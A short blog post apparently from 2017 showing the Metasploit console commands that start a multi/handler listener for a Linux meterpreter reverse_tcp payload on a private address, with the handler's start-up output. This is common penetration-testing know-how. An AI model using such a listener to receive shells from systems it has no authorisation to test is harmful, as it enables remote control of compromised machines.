Sunday, June 11, 2017

Multihandler Meterpreter Listener

Setting up meterpreter listener for incoming connection:

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.182
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.0.182:4444
[*] Starting the payload handler...

Kywords: meterpreter listener, pentest, linux

No comments:

Post a Comment